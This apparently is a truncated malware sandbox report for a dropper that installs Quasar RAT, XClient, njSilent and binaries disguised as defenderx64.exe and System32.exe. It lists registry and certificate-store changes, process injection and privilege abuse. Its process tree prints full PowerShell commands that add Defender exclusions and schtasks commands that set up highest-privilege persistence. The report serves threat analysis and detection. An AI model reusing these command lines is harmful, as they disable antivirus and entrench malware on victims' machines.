pid Process 1640 taskkill.exe 15284 taskkill.exe 11684 taskkill.exe 12932 taskkill.exe 2516 taskkill.exe 5068 taskkill.exe 6552 taskkill.exe 4744 taskkill.exe 9676 taskkill.exe 14528 taskkill.exe 1584 taskkill.exe 5208 taskkill.exe 3624 taskkill.exe 6428 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main update.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.enigma Enigma32g.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\EnigmaProjectFile\Shell Enigma32g.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\EnigmaProjectFile\Shell\Open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\Files\\Enigma32g.exe\" \"%1\"" Enigma32g.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\EnigmaProjectFile\DefaultIcon Enigma32g.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.enigma\ = "EnigmaProjectFile" Enigma32g.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\EnigmaProjectFile Enigma32g.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\EnigmaProjectFile\ = "The Enigma Protector project file" Enigma32g.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\EnigmaProjectFile\Shell\Open Enigma32g.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\EnigmaProjectFile\Shell\Open\command Enigma32g.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\EnigmaProjectFile\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Files\\Files\\Enigma32g.exe,0" Enigma32g.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a lkyhjksefa.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 4363463463464363463463463.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 lkyhjksefa.exe -
Runs ping.exe 1 TTPs 51 IoCs
pid Process 8644 PING.EXE 6116 PING.EXE 448 PING.EXE 3644 PING.EXE 4372 PING.EXE 2012 PING.EXE 4992 PING.EXE 4128 PING.EXE 6720 PING.EXE 3864 PING.EXE 3356 PING.EXE 3808 PING.EXE 3476 PING.EXE 3752 PING.EXE 8832 PING.EXE 3456 PING.EXE 4140 PING.EXE 9136 PING.EXE 6384 PING.EXE 12700 PING.EXE 1672 PING.EXE 3712 PING.EXE 3368 PING.EXE 5036 PING.EXE 5604 PING.EXE 10660 PING.EXE 9556 PING.EXE 3748 PING.EXE 3448 PING.EXE 3464 PING.EXE 3956 PING.EXE 4332 PING.EXE 4484 PING.EXE 6304 PING.EXE 5952 PING.EXE 3248 PING.EXE 3252 PING.EXE 3436 PING.EXE 3400 PING.EXE 3712 PING.EXE 4388 PING.EXE 8576 PING.EXE 112 PING.EXE 4052 PING.EXE 976 PING.EXE 4136 PING.EXE 6180 PING.EXE 7400 PING.EXE 3880 PING.EXE 3376 PING.EXE 3288 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1040 schtasks.exe 8196 schtasks.exe 12020 schtasks.exe 3768 schtasks.exe 2456 schtasks.exe 4876 schtasks.exe 2996 schtasks.exe 7732 schtasks.exe 3660 schtasks.exe 11380 SCHTASKS.exe 2684 schtasks.exe 3272 schtasks.exe 4048 schtasks.exe 3436 schtasks.exe 4236 schtasks.exe 11060 schtasks.exe 9212 schtasks.exe 2832 schtasks.exe 2876 schtasks.exe 1852 schtasks.exe 2632 schtasks.exe 2584 schtasks.exe 4192 schtasks.exe 4864 schtasks.exe 4900 schtasks.exe 4568 schtasks.exe 3152 schtasks.exe 3792 schtasks.exe 1884 schtasks.exe 3668 schtasks.exe 7344 schtasks.exe 2756 schtasks.exe 3124 schtasks.exe 5004 schtasks.exe 4812 schtasks.exe 4404 schtasks.exe 10276 schtasks.exe 4692 schtasks.exe 6224 schtasks.exe 2600 schtasks.exe 2140 schtasks.exe 2996 schtasks.exe 7448 schtasks.exe 5964 schtasks.exe 3320 schtasks.exe 2360 schtasks.exe 4388 schtasks.exe 2684 schtasks.exe 4776 schtasks.exe 5092 schtasks.exe 4200 schtasks.exe 9160 schtasks.exe 10124 schtasks.exe 872 schtasks.exe 2092 schtasks.exe 3692 schtasks.exe 2444 schtasks.exe 3736 schtasks.exe 4444 schtasks.exe 4724 schtasks.exe 5896 schtasks.exe 3748 schtasks.exe 3816 schtasks.exe 2468 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1460 powershell.exe 1612 powershell.exe 2636 powershell.exe 2220 powershell.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 2356 powershell.exe 1604 powershell.exe 2068 powershell.exe 1228 boleto.exe 1796 powershell.exe 2664 Client.exe 2664 Client.exe 2664 Client.exe 1228 boleto.exe 1228 boleto.exe 1228 boleto.exe 1228 boleto.exe 1228 boleto.exe 1228 boleto.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 1228 boleto.exe 1228 boleto.exe 1228 boleto.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 1228 boleto.exe 1228 boleto.exe 1228 boleto.exe 2428 XClient.exe 2428 XClient.exe 2428 XClient.exe 1228 boleto.exe 1228 boleto.exe 1228 boleto.exe -
Suspicious behavior: GetForegroundWindowSpam 3 IoCs
pid Process 3108 testme.exe 4000 Host.exe 4952 server.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2268 4363463463464363463463463.exe Token: SeDebugPrivilege 2428 XClient.exe Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeDebugPrivilege 2332 4363463463464363463463463.exe Token: SeDebugPrivilege 2636 powershell.exe Token: SeDebugPrivilege 2220 powershell.exe Token: SeDebugPrivilege 2428 XClient.exe Token: SeDebugPrivilege 1964 4363463463464363463463463.exe Token: SeDebugPrivilege 1232 XClient.exe Token: SeDebugPrivilege 2916 4363463463464363463463463.exe Token: SeDebugPrivilege 2632 OLDxTEAM.exe Token: SeDebugPrivilege 2988 4363463463464363463463463.exe Token: SeDebugPrivilege 1532 4363463463464363463463463.exe Token: SeDebugPrivilege 1228 boleto.exe Token: SeDebugPrivilege 1556 4363463463464363463463463.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 2068 powershell.exe Token: SeDebugPrivilege 1228 boleto.exe Token: SeDebugPrivilege 784 OneDrive.exe Token: SeDebugPrivilege 1328 Onedrive.exe Token: SeDebugPrivilege 1796 powershell.exe Token: SeDebugPrivilege 2664 Client.exe Token: SeDebugPrivilege 2664 Client.exe Token: SeDebugPrivilege 2124 defender64.exe Token: SeDebugPrivilege 2236 defenderx64.exe Token: SeDebugPrivilege 1356 svchost.exe Token: SeDebugPrivilege 1356 svchost.exe Token: SeDebugPrivilege 1604 4363463463464363463463463.exe Token: SeDebugPrivilege 2688 2klz.exe Token: SeDebugPrivilege 3032 2klz.exe Token: SeDebugPrivilege 2448 lmao.exe Token: SeDebugPrivilege 2840 Client.exe Token: SeDebugPrivilege 624 4363463463464363463463463.exe Token: SeDebugPrivilege 2808 defenderx64.exe Token: SeDebugPrivilege 1648 kthiokadjg.exe Token: SeDebugPrivilege 2344 XClient.exe Token: SeDebugPrivilege 2796 boleto.exe Token: SeDebugPrivilege 2060 4363463463464363463463463.exe Token: SeDebugPrivilege 3348 2klz.exe Token: SeDebugPrivilege 3572 update.exe Token: SeDebugPrivilege 3684 defenderx64.exe Token: SeDebugPrivilege 3900 main.exe Token: SeDebugPrivilege 3980 discord.exe Token: SeDebugPrivilege 4068 main-pc.exe Token: SeDebugPrivilege 3336 2klz.exe Token: SeDebugPrivilege 3468 dllhost.exe Token: SeDebugPrivilege 3608 defenderx64.exe Token: SeDebugPrivilege 3180 Client-built-Playit.exe Token: SeDebugPrivilege 3332 System32.exe Token: SeDebugPrivilege 3448 jignesh.exe Token: SeDebugPrivilege 3452 Sentil.exe Token: SeDebugPrivilege 328 Client1.exe Token: SeDebugPrivilege 3728 2klz.exe Token: 33 3468 dllhost.exe Token: SeIncBasePriorityPrivilege 3468 dllhost.exe Token: SeDebugPrivilege 3196 defenderx64.exe Token: SeDebugPrivilege 3676 Client-built.exe Token: SeDebugPrivilege 2760 System32.exe Token: SeDebugPrivilege 2148 2klz.exe Token: 33 3468 dllhost.exe Token: SeIncBasePriorityPrivilege 3468 dllhost.exe Token: SeDebugPrivilege 3908 defenderx64.exe -
Suspicious use of FindShellTrayWindow 33 IoCs
pid Process 2156 prueba.exe 2852 Free YouTube Downloader.exe 2236 defenderx64.exe 3032 2klz.exe 2840 Client.exe 2808 defenderx64.exe 3348 2klz.exe 3684 defenderx64.exe 3336 2klz.exe 3608 defenderx64.exe 3572 update.exe 3864 evetbeta.exe 328 Client1.exe 3728 2klz.exe 3196 defenderx64.exe 2148 2klz.exe 3908 defenderx64.exe 2464 2klz.exe 3860 defenderx64.exe 1716 2klz.exe 3256 defenderx64.exe 3268 2klz.exe 3544 defenderx64.exe 824 2klz.exe 3368 defenderx64.exe 1408 2klz.exe 3464 defenderx64.exe 4956 2klz.exe 4188 defenderx64.exe 2220 2klz.exe 3272 defenderx64.exe 4784 2klz.exe 4432 defenderx64.exe -
Suspicious use of SendNotifyMessage 32 IoCs
pid Process 2156 prueba.exe 2852 Free YouTube Downloader.exe 2236 defenderx64.exe 3032 2klz.exe 2840 Client.exe 2808 defenderx64.exe 3348 2klz.exe 3684 defenderx64.exe 3336 2klz.exe 3608 defenderx64.exe 3864 evetbeta.exe 328 Client1.exe 3728 2klz.exe 3196 defenderx64.exe 2148 2klz.exe 3908 defenderx64.exe 2464 2klz.exe 3860 defenderx64.exe 1716 2klz.exe 3256 defenderx64.exe 3268 2klz.exe 3544 defenderx64.exe 824 2klz.exe 3368 defenderx64.exe 1408 2klz.exe 3464 defenderx64.exe 4956 2klz.exe 4188 defenderx64.exe 2220 2klz.exe 3272 defenderx64.exe 4784 2klz.exe 4432 defenderx64.exe -
Suspicious use of SetWindowsHookEx 32 IoCs
pid Process 2428 XClient.exe 1228 boleto.exe 440 Enigma32g.exe 2840 Client.exe 1648 kthiokadjg.exe 3348 2klz.exe 3572 update.exe 3572 update.exe 4068 main-pc.exe 3336 2klz.exe 3332 System32.exe 328 Client1.exe 3728 2klz.exe 4000 Host.exe 3220 svchost.exe 1960 System32.exe 3284 nbothjkd.exe 3736 System32.exe 3268 2klz.exe 824 2klz.exe 3556 System32.exe 1408 2klz.exe 2104 hbfgjhhesfd.exe 3724 nobody.exe 4868 System32.exe 4956 2klz.exe 3992 22.exe 4300 System32.exe 2220 2klz.exe 3180 System32.exe 4664 lkyhjksefa.exe 4784 2klz.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2268 wrote to memory of 2428 2268 4363463463464363463463463.exe 32 PID 2268 wrote to memory of 2428 2268 4363463463464363463463463.exe 32 PID 2268 wrote to memory of 2428 2268 4363463463464363463463463.exe 32 PID 2268 wrote to memory of 2428 2268 4363463463464363463463463.exe 32 PID 2428 wrote to memory of 1460 2428 XClient.exe 34 PID 2428 wrote to memory of 1460 2428 XClient.exe 34 PID 2428 wrote to memory of 1460 2428 XClient.exe 34 PID 2428 wrote to memory of 1612 2428 XClient.exe 36 PID 2428 wrote to memory of 1612 2428 XClient.exe 36 PID 2428 wrote to memory of 1612 2428 XClient.exe 36 PID 2428 wrote to memory of 2636 2428 XClient.exe 40 PID 2428 wrote to memory of 2636 2428 XClient.exe 40 PID 2428 wrote to memory of 2636 2428 XClient.exe 40 PID 2428 wrote to memory of 2220 2428 XClient.exe 42 PID 2428 wrote to memory of 2220 2428 XClient.exe 42 PID 2428 wrote to memory of 2220 2428 XClient.exe 42 PID 2428 wrote to memory of 2876 2428 XClient.exe 44 PID 2428 wrote to memory of 2876 2428 XClient.exe 44 PID 2428 wrote to memory of 2876 2428 XClient.exe 44 PID 604 wrote to memory of 1232 604 taskeng.exe 50 PID 604 wrote to memory of 1232 604 taskeng.exe 50 PID 604 wrote to memory of 1232 604 taskeng.exe 50 PID 2268 wrote to memory of 2632 2268 4363463463464363463463463.exe 53 PID 2268 wrote to memory of 2632 2268 4363463463464363463463463.exe 53 PID 2268 wrote to memory of 2632 2268 4363463463464363463463463.exe 53 PID 2268 wrote to memory of 2632 2268 4363463463464363463463463.exe 53 PID 2632 wrote to memory of 2368 2632 OLDxTEAM.exe 54 PID 2632 wrote to memory of 2368 2632 OLDxTEAM.exe 54 PID 2632 wrote to memory of 2368 2632 OLDxTEAM.exe 54 PID 2632 wrote to memory of 2368 2632 OLDxTEAM.exe 54 PID 2916 wrote to memory of 1228 2916 4363463463464363463463463.exe 62 PID 2916 wrote to memory of 1228 2916 4363463463464363463463463.exe 62 PID 2916 wrote to memory of 1228 2916 4363463463464363463463463.exe 62 PID 2916 wrote to memory of 1228 2916 4363463463464363463463463.exe 62 PID 2916 wrote to memory of 2300 2916 4363463463464363463463463.exe 63 PID 2916 wrote to memory of 2300 2916 4363463463464363463463463.exe 63 PID 2916 wrote to memory of 2300 2916 4363463463464363463463463.exe 63 PID 2916 wrote to memory of 2300 2916 4363463463464363463463463.exe 63 PID 1228 wrote to memory of 2356 1228 boleto.exe 67 PID 1228 wrote to memory of 2356 1228 boleto.exe 67 PID 1228 wrote to memory of 2356 1228 boleto.exe 67 PID 1228 wrote to memory of 1604 1228 boleto.exe 69 PID 1228 wrote to memory of 1604 1228 boleto.exe 69 PID 1228 wrote to memory of 1604 1228 boleto.exe 69 PID 1228 wrote to memory of 2068 1228 boleto.exe 71 PID 1228 wrote to memory of 2068 1228 boleto.exe 71 PID 1228 wrote to memory of 2068 1228 boleto.exe 71 PID 1228 wrote to memory of 756 1228 boleto.exe 73 PID 1228 wrote to memory of 756 1228 boleto.exe 73 PID 1228 wrote to memory of 756 1228 boleto.exe 73 PID 1556 wrote to memory of 2156 1556 4363463463464363463463463.exe 75 PID 1556 wrote to memory of 2156 1556 4363463463464363463463463.exe 75 PID 1556 wrote to memory of 2156 1556 4363463463464363463463463.exe 75 PID 1556 wrote to memory of 2156 1556 4363463463464363463463463.exe 75 PID 2988 wrote to memory of 784 2988 4363463463464363463463463.exe 77 PID 2988 wrote to memory of 784 2988 4363463463464363463463463.exe 77 PID 2988 wrote to memory of 784 2988 4363463463464363463463463.exe 77 PID 2988 wrote to memory of 784 2988 4363463463464363463463463.exe 77 PID 2988 wrote to memory of 2164 2988 4363463463464363463463463.exe 78 PID 2988 wrote to memory of 2164 2988 4363463463464363463463463.exe 78 PID 2988 wrote to memory of 2164 2988 4363463463464363463463463.exe 78 PID 2988 wrote to memory of 2164 2988 4363463463464363463463463.exe 78 PID 2988 wrote to memory of 2164 2988 4363463463464363463463463.exe 78 PID 2988 wrote to memory of 2164 2988 4363463463464363463463463.exe 78 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"1⤵
- Quasar RAT
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2268 -
C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2876
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\OLDxTEAM.exe"C:\Users\Admin\AppData\Local\Temp\Files\OLDxTEAM.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 5203⤵
- Loads dropped DLL
- Program crash
PID:2368
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\njSilent.exe"C:\Users\Admin\AppData\Local\Temp\Files\njSilent.exe"2⤵
- Executes dropped EXE
PID:2676
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Host.exe"C:\Users\Admin\AppData\Local\Temp\Files\Host.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4000
-
-
C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Files\Client-built.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3676 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:2468
-
-
C:\Users\Admin\AppData\Roaming\System32\System32.exe"C:\Users\Admin\AppData\Roaming\System32\System32.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2760 -
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "System32" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\System32.exe" /rl HIGHEST /f4⤵PID:440
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RBnXSCfs4Glm.bat" "4⤵PID:3916
-
C:\Windows\system32\chcp.comchcp 650015⤵PID:3508
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3880
-
-
